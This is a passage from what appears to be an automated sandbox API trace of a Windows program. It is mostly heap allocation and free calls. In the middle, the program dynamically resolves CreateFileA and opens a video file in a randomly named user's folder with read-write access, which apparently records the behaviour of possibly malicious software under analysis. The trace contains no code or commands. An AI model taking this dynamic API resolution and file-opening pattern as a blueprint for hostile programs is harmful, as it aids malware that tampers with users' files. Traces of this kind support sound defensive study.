(HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0042.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0042.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0042.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0042.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0042.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0042.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0042.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0042.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0042.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0042.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0042.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0042.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0042.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0042.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0042.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0042.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0042.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0042.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0042.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0042.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0042.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0042.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0042.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0042.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0042.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0042.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0042.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0042.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0042.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0042.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0042.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0042.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0042.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0042.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0042.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0042.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0042.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0042.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0042.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0042.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0042.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0042.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0042.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0042.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0042.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0042.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0042.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0042.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0042.490] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0042.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0042.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0042.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0042.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0042.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0042.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0042.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0042.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0042.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0042.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0042.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0042.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0042.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0042.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0042.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0042.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0042.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0042.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0042.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0042.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0042.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0042.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0042.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0042.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0042.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0042.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0042.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0042.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0042.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0042.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0042.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0042.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0042.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0042.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0042.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0042.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0042.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0042.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0042.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0042.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0042.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0042.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0042.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0042.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0042.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0042.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0042.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0042.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0042.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.493] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0042.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0042.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x8899b8 [0042.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x8899b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0042.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0042.493] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0042.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0042.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0042.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0042.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0042.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8899b8 [0042.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x8899b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0042.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0042.494] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0042.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0042.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0042.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0042.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0042.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0042.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0042.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0042.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0042.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x35) returned 0x7c2080 [0042.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv", cchWideChar=53, lpMultiByteStr=0x7c2080, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv", lpUsedDefaultChar=0x0) returned 53 [0042.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0042.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.496] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\mrin.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0042.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0042.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0042.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0042.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0042.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0042.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0042.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0042.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0042.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0042.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0042.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0042.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0042.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=53, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0042.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6a) returned 0x7db300 [0042.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=53, lpWideCharStr=0x7db300, cchWideChar=53 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv") returned 53 [0042.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0042.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0042.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0042.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0042.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0042.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0042.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0042.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0042.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0042.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0042.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0042.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0042.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0042.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0042.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0042.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0042.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0042.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0042.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0042.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0042.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0042.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0042.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0042.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0042.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0042.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0042.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0042.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0042.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: 